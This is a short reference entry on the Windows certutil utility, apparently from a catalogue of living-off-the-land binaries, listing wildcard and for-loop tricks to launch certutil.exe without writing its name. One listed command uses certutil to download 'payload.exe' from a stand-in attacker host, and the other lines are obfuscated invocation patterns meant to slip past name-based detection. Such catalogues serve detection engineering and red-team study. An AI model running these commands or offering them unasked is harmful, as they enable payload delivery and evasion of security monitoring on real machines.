certutil
Certificate management utility. Widely abused for base64 encoding/decoding and downloading files from the internet.
Binary Paths
C:\Windows\System32\certutil.exe
Glob Patterns
| Pattern | Wildcards | Notes |
|---|---|---|
for /f %i in ('where c*til.exe') do %i -urlcache -split -f http://attacker.com/payload.exe C:\payload.exe
|
* | CMD requires 'where' + for loop since glob doesn't work in command position. Star matches 'er' + 'u' |
for /f %i in ('where cert?til.exe') do %i
|
? | Single char wildcard in where query |
for /f %i in ('where certutil*') do %i
|
* | Trailing star matches '.exe' and variant names |
cmd /c for /f %i in ('dir /b C:\Windows\System32\cert*.exe') do %i
|
* | Using dir /b with glob to find binary |
for /f %i in ('where /r C:\Windows c*til.exe') do %i
|
* | Recursive where search with wildcard |
Platform Notes
CMD does not expand glob wildcards in the command position. Unlike bash, typing c*rtutil will not work directly in CMD. Instead, use:
for /f %i in ('where c*til.exe') do @%i [args]— resolves via where.exefor /f %i in ('dir /b C:\Windows\System32\cert*.exe') do @%i— resolves via dir
In batch scripts, use %%i instead of %i.